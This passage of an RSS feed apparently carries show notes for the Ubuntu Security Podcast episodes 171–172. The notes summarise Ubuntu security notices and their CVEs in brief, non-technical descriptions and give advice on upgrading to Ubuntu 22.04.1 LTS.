<li><a href="https://ubuntu.com/security/CVE-2021-4209">CVE-2021-4209</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer deref and double-free during verification of pkcs7
signatures -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5551-1-mod-wsgi-vulnerability-08-10">[<a href="https://ubuntu.com/security/notices/USN-5551-1">USN-5551-1</a>] mod-wsgi vulnerability [08:10]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2255">CVE-2022-2255</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would pass through the <code>X-Client-IP</code> header to <code>WSGI</code> applications, even when
it came from an untrusted proxy and hence could allow unintended access
to services</li>
</ul>
<h3 id="usn-5548-1-libxml2-vulnerability-08-32">[<a href="https://ubuntu.com/security/notices/USN-5548-1">USN-5548-1</a>] libxml2 vulnerability [08:32]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-3709">CVE-2016-3709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible HTML/code injection -&gt; XSS since would fail to properly handle
escape server-side includes</li>
<li>Reported back in 2016 to GNOME project, was seemingly ignored until the
offending commit which introduced the vuln was reverted ~2 years ago</li>
<li>Later versions not affected then</li>
<li>CVE only assigned a few weeks ago</li>
<li>Interestingly the discussion in 2018 included a pointer to three
different CVEs in other XML/HTML parsing and sanitization libraries for
the same type of issue - but in this case was ignored and no CVE assigned
until now</li>
</ul>
<h3 id="usn-5552-1-phpliteadmin-vulnerability-11-29">[<a href="https://ubuntu.com/security/notices/USN-5552-1">USN-5552-1</a>] phpLiteAdmin vulnerability [11:29]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46709">CVE-2021-46709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XSS through failure to validate the <code>newRows</code> parameter</li>
</ul>
<h3 id="usn-5553-1-libjpeg-turbo-vulnerabilities-11-42">[<a href="https://ubuntu.com/security/notices/USN-5553-1">USN-5553-1</a>] libjpeg-turbo vulnerabilities [11:42]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-17541">CVE-2020-17541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14152">CVE-2020-14152</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14498">CVE-2018-14498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11813">CVE-2018-11813</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption issues -&gt; heap and stack buffer overflows</li>
<li>Logic issue and a failure to limit overall memory consumption during
decompression leading to very large memory usage -&gt; DoS</li>
</ul>
<h3 id="usn-5554-1-gdk-pixbuf-vulnerability-12-06">[<a href="https://ubuntu.com/security/notices/USN-5554-1">USN-5554-1</a>] GDK-PixBuf vulnerability [12:06]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46829">CVE-2021-46829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow for crafted animated GIFs -&gt; code execution
particularly on 32-bit platforms</li>
</ul>
<h3 id="usn-5555-1-gstreamer-good-plugins-vulnerabilities-12-29">[<a href="https://ubuntu.com/security/notices/USN-5555-1">USN-5555-1</a>] GStreamer Good Plugins vulnerabilities [12:29]</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2122">CVE-2022-2122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1925">CVE-2022-1925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1924">CVE-2022-1924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1923">CVE-2022-1923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1922">CVE-2022-1922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1921">CVE-2022-1921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1920">CVE-2022-1920</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various integer overflows etc leading to heap buffer overflows in various
video codec handlers -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5558-1-libcdio-vulnerabilities-13-00">[<a href="https://ubuntu.com/security/notices/USN-5558-1">USN-5558-1</a>] libcdio vulnerabilities [13:00]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18199">CVE-2017-18199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18198">CVE-2017-18198</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Audio CD read/control library</li>
<li>2 different memory management issues when handling crafted ISO files -
heap buffer over-read and NULL pointer dereference -&gt; DoS</li>
</ul>
<h3 id="usn-5557-1-linux-kernel-vulnerabilities-13-44">[<a href="https://ubuntu.com/security/notices/USN-5557-1">USN-5557-1</a>] Linux kernel vulnerabilities [13:44]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4</li>
<li>UAF in Network package scheduler - could create a route filter which when
removed would still be referred to by other data structures and then
allow a user to trigger access to this -&gt; DoS / RCE</li>
<li>Similarly in netfilter, could have one nft object be referred to by an
nft set in another table -&gt; UAF</li>
</ul>
<h3 id="usn-5560-1-usn-5560-2-linux-kernel-vulnerabilities-14-37">[<a href="https://ubuntu.com/security/notices/USN-5560-1">USN-5560-1</a>, <a href="https://ubuntu.com/security/notices/USN-5560-2">USN-5560-2</a>] Linux kernel vulnerabilities [14:37]</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33981">CVE-2022-33981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1195">CVE-2022-1195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0494">CVE-2022-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2586">CVE-2022-2586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2588">CVE-2022-2588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 GA for 18.04 LTS, HWE etc for 16.04 ESM, Azure for 14.04 ESM</li>
<li>Various vulns plus the 2 network related UAFs above</li>
</ul>
<h3 id="usn-5561-1-gnome-web-vulnerabilities-14-58">[<a href="https://ubuntu.com/security/notices/USN-5561-1">USN-5561-1</a>] GNOME Web vulnerabilities [14:58]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29536">CVE-2022-29536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45087">CVE-2021-45087</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45086">CVE-2021-45086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45085">CVE-2021-45085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Epiphany web browser</li>
<li>3 different XSS issues, 1 buffer overflow via a very long page title -&gt;
gets ellipsised but UTF-8 length of ellipsis is not properly counted so
then overflows bounds -&gt; DoS/RCE</li>
</ul>
<h3 id="usn-5559-1-moment-dot-js-vulnerabilities-15-40">[<a href="https://ubuntu.com/security/notices/USN-5559-1">USN-5559-1</a>] Moment.js vulnerabilities [15:40]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31129">CVE-2022-31129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24785">CVE-2022-24785</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Date handling library for nodejs applications</li>
<li>Path traversal vuln since could end up using a user provided locale
string to switch the locale which would then result in reading arbitrary
local files</li>
<li>Quadratic complexity algorithm due to use of regexps to parse strings to
dates - in particular <a href="https://www.rfc-editor.org/rfc/rfc2822">rfc2822</a> formats which are tried by default - ReDoS
-&gt; very large input could result in significant CPU-based DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-04-dot-1-lts-released-16-43">Ubuntu 22.04.1 LTS released [16:43]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2022-August/000282.html">https://lists.ubuntu.com/archives/ubuntu-announce/2022-August/000282.html</a></li>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668">https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668</a></li>
<li><a href="https://www.youtube.com/watch?v=REdxblQpsDE">https://www.youtube.com/watch?v=REdxblQpsDE</a></li>
<li>Includes all the various bug and security fixes that have gone into the
22.04 LTS release so far - if you are already running 22.04 LTS you don&rsquo;t
have to do anything to get this- just make sure you have been installing
updates 😉</li>
<li>The full list of changes targeted for this release can be found at
<a href="https://discourse.ubuntu.com/t/jammy-jellyfish-point-release-changes/29835">https://discourse.ubuntu.com/t/jammy-jellyfish-point-release-changes/29835</a></li>
<li>Now is when users of 20.04 LTS desktop will start being prompted to
upgrade to 22.04 - I definitely recommend to upgrade, and to make the
process as smooth as possible, do it from a virtual terminal
<ul>
<li>This is the standard interface used for Ubuntu Server - full-screen
terminal running directly on a console - no graphical environment</li>
<li>as such, has a lot less processes and infrastructure running and so
there is less chance that something may crash during the upgrade
process - since libraries get swapped out from underneath various
running processes etc</li>
</ul>
</li>
<li>Log out of your graphical session, then when at the GDM Greeter / user
chooser log in screen hit <code>CTRL + ALT + F2</code></li>
<li>You will then be presented with a console prompt - log in with your
username and password, then you can start the upgrade process by running</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo <span style="color:#66d9ef">do</span>-release-upgrade
</span></span></code></pre></div><ul>
<li>This is the same way this is done for Ubuntu Server</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E172.mp3" length="16426280" type="audio/mpeg" /><itunes:duration>1307</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 171
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-171/</link>
          <pubDate>Fri, 05 Aug 2022 22:18:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>5cdcc2c0bd2d2f825af0ec52ac6e4c43a7b1b3b420af9a71e46cde9ee0fbfa5fee9cb5604e8138b824977826ea69695a65cf021f5e8cc48e3b5b67b4417f9d90</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 171</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we dig into what community sponsored security updates are all
  about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security
  updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we dig into what community sponsored security updates are all
  about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security
  updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
  </itunes:summary>
        <description>  This week we dig into what community sponsored security updates are all
  about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security
  updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
  </description>
        <googleplay:description>  This week we dig into what community sponsored security updates are all
  about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security
  updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we dig into what community sponsored security updates are all
about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security
updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>75 unique CVEs addressed</p>
<h3 id="usn-5535-1-intel-microcode-vulnerabilities-00-43">[<a href="https://ubuntu.com/security/notices/USN-5535-1">USN-5535-1</a>] Intel Microcode vulnerabilities [00:43]</h3>
<ul>
<li>10 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33120">CVE-2021-33120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33117">CVE-2021-33117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21151">CVE-2022-21151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21127">CVE-2022-21127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0127">CVE-2021-0127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0146">CVE-2021-0146</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0145">CVE-2021-0145</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream release IPU 2022.1</li>
<li><a href="/episode-165/#usn-5486-1-intel-microcode-vulnerabilities-06-01">[USN-5486-1] Intel Microcode vulnerabilities</a></li>
<li>Includes fixes for MMIO stale data which we covered in <a href="/episode-164/#news-on-latest-intel-security-issues-06-33">News on latest Intel security issues in Episode 164</a></li>
</ul>
<h3 id="usn-5537-1-usn-5537-2-mysql-vulnerabilities-01-22">[<a href="https://ubuntu.com/security/notices/USN-5537-1">USN-5537-1</a>, <a href="https://ubuntu.com/security/notices/USN-5537-2">USN-5537-2</a>] MySQL vulnerabilities [01:22]</h3>
<ul>
<li>18 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21569">CVE-2022-21569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21553">CVE-2022-21553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21547">CVE-2022-21547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21539">CVE-2022-21539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21538">CVE-2022-21538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21537">CVE-2022-21537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21534">CVE-2022-21534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21531">CVE-2022-21531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21530">CVE-2022-21530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21529">CVE-2022-21529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21528">CVE-2022-21528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21527">CVE-2022-21527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21526">CVE-2022-21526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21525">CVE-2022-21525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21522">CVE-2022-21522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21517">CVE-2022-21517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21515">CVE-2022-21515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21509">CVE-2022-21509</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest point releases from Oracle</li>
<li>8.0.30 for 20.04 and 22.04 LTS</li>
<li>5.7.39 for 18.04 LTS and 16.04 ESM</li>
<li>As always - includes both security and bug fixes as well as new features
and possible incompatible changes</li>
</ul>
<h3 id="usn-5538-1-libtirpc-vulnerability-01-59">[<a href="https://ubuntu.com/security/notices/USN-5538-1">USN-5538-1</a>] libtirpc vulnerability [01:59]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46828">CVE-2021-46828</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Transport independent RPC library - Used by autofs, libvirt, nfs-utils,
python, samba, yp-tools and lots more</li>
<li>Failed to properly handle timeouts from idle clients - would still keep a
file descriptor open and eventually would exhaust available fds so could
then not accept new connections (since it would also not handle the case
of no available fds either and would spin in a busy loop trying to accept
new connections) - CPU-based DoS</li>
</ul>
<h3 id="usn-5536-1-firefox-vulnerabilities-02-47">[<a href="https://ubuntu.com/security/notices/USN-5536-1">USN-5536-1</a>] Firefox vulnerabilities [02:47]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36320">CVE-2022-36320</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36319">CVE-2022-36319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36318">CVE-2022-36318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36316">CVE-2022-36316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36315">CVE-2022-36315</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2505">CVE-2022-2505</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>103.0</li>
<li>Firefox is now a snap on 22.04 LTS so gets updated automatically by
Mozilla</li>
</ul>
<h3 id="usn-5544-1-linux-kernel-vulnerabilities-03-06">[<a href="https://ubuntu.com/security/notices/USN-5544-1">USN-5544-1</a>] Linux kernel vulnerabilities [03:06]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28893">CVE-2022-28893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 22.04 LTS GA / 20.04 LTS HWE</li>
<li>UAF in Atheros ath9k driver when handling certain error conditions, Sun
RPC and floppy driver</li>
<li>Also a type confusion bug in netfilter - local user who has <code>CAP_NET_ADMIN</code>
(which can be done via mapping to root in an unprivileged user
namespace) -&gt; privesc</li>
</ul>
<h3 id="usn-5545-1-linux-kernel--oem--vulnerability-03-49">[<a href="https://ubuntu.com/security/notices/USN-5545-1">USN-5545-1</a>] Linux kernel (OEM) vulnerability [03:49]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>netfilter privesc above for 5.14 and 5.17 OEM kernels in 20.04 and 22.04
LTS respectively</li>
</ul>
<h3 id="usn-5539-1-linux-kernel-vulnerabilities-04-11">[<a href="https://ubuntu.com/security/notices/USN-5539-1">USN-5539-1</a>] Linux kernel vulnerabilities [04:11]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33981">CVE-2022-33981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1789">CVE-2022-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1204">CVE-2022-1204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1199">CVE-2022-1199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1195">CVE-2022-1195</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - NVIDIA BlueField on 20.04 LTS and GCP/GKE 18.04 LTS</li>
<li>6 out of 7 are various UAF bugs - 3 in the AX.25 amateur radio protocol
driver, 1 in 6pack and mkiss protocol drivers, 1 in 8 Devices USB2CAN and
1 in floppy driver</li>
<li>KVM hypervisor failed to handle guest TLB invalidations - guest could
then corrupt host memory</li>
<li>Result of all these is memory corruption -&gt; crash / code-execution</li>
</ul>
<h3 id="usn-5541-1-linux-kernel--azure--vulnerabilities-05-04">[<a href="https://ubuntu.com/security/notices/USN-5541-1">USN-5541-1</a>] Linux kernel (Azure) vulnerabilities [05:04]</h3>
<ul>
<li>11 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28389">CVE-2022-28389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2380">CVE-2022-2380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1204">CVE-2022-1204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1199">CVE-2022-1199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1198">CVE-2022-1198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1011">CVE-2022-1011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 azure</li>
<li>Most of the same vulnerabilities mentioned earlier plus some covered in
previous episodes - cgroup process migration privesc, UAF in FUSE etc</li>
</ul>
<h3 id="usn-5540-1-linux-kernel-vulnerabilities-05-26">[<a href="https://ubuntu.com/security/notices/USN-5540-1">USN-5540-1</a>] Linux kernel vulnerabilities [05:26]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34918">CVE-2022-34918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25375">CVE-2022-25375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25258">CVE-2022-25258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20141">CVE-2022-20141</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - 16.04 ESM GA (lowlatency, AWS, KVM etc) + 14.04 ESM</li>
<li>race-condition -&gt; UAF in IGMP protocol impl - local user -&gt; DoS /
code-exec</li>
<li>Memory corruption in USB gadget driver</li>
<li>OOB read in RNDIS driver -&gt; info leak / crash</li>
<li>netfilter privesc</li>
</ul>
<h3 id="usn-5542-1-samba-vulnerabilities-06-06">[<a href="https://ubuntu.com/security/notices/USN-5542-1">USN-5542-1</a>] Samba vulnerabilities [06:06]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32746">CVE-2022-32746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32745">CVE-2022-32745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32744">CVE-2022-32744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32742">CVE-2022-32742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2031">CVE-2022-2031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3670">CVE-2021-3670</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Didn&rsquo;t handle <code>MaxQueryDuration</code> as expected</li>
<li>Possible privesc since restrictions were not enforced properly when
changing passwords</li>
<li>Separate password-based privesc since could forge a password request with
your own key that was destined for another user and therefore change
their password (including domain admin)</li>
<li>Memory corruption via crafted LDAP request -&gt; DoS / info leak</li>
<li>Unfortunately due to the large amount of code-churn in samba from the
version used in 18.04 LTS (4.7.6) compared to the current upstream
release (4.16.x) it is not possible to backport these patches without a
reasonable risk of introducing a regression - as such users of samba in
18.04 LTS who are concerned about these vulnerabilities are advised to
upgrade to Ubuntu 20.04 LTS or newer to continue receiving security
support for samba</li>
</ul>
<h3 id="usn-5543-1-net-snmp-vulnerabilities-07-25">[<a href="https://ubuntu.com/security/notices/USN-5543-1">USN-5543-1</a>] Net-SNMP vulnerabilities [07:25]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24810">CVE-2022-24810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24809">CVE-2022-24809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24808">CVE-2022-24808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24807">CVE-2022-24807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24806">CVE-2022-24806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24805">CVE-2022-24805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
